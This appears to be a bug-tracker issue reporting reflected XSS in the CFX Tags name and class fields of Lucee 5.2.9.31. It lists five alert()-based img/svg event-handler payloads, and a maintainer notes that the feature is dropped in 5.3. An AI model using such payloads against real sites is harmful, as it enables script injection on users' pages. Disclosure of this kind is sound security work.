XSS in CFX Tags in Lucee 5.2.9.31

Description

There’s a few reflected XSS in the CFX Tags caused by insufficient user input XSS filtering.

Step to reproduce:
1. in Name Field -> Add Anything
2. in Class -> Add XSS.

i Found 5 valid XSS which are:
<img src=""onerror="alert(1)"/>
'<img src=x onerror=alert(1)>
<img src=x onerror=alert()>
"><svg onload=alert(1)>
<><img src=1 onerror=alert(1337)>

btw, is there any information about http smuggling, jquery issue and clickjacking in this issue development. because i found some of them in this lucee version. i tested in :
CentOS 7.6 (Linux (3.10.0-957.5.1.el7.x86_64) 64bit)
Apache Tomcat/8.5.33
Java 1.8.0_181 (64 Bit)

thanks

Environment

None

Activity

Show:

Zac Spitzer

September 8, 2020, 11:53 AM

Copy link to comment

CFX are no longer supported in 5.3, the whole underlying XSS issue is LDEV-3050

Ami

September 10, 2020, 6:00 AM

Copy link to comment

ok, thanks for the info

thanks

Assignee

Unassigned

Reporter

Ami

Priority

New

Labels

security

xss

Fix versions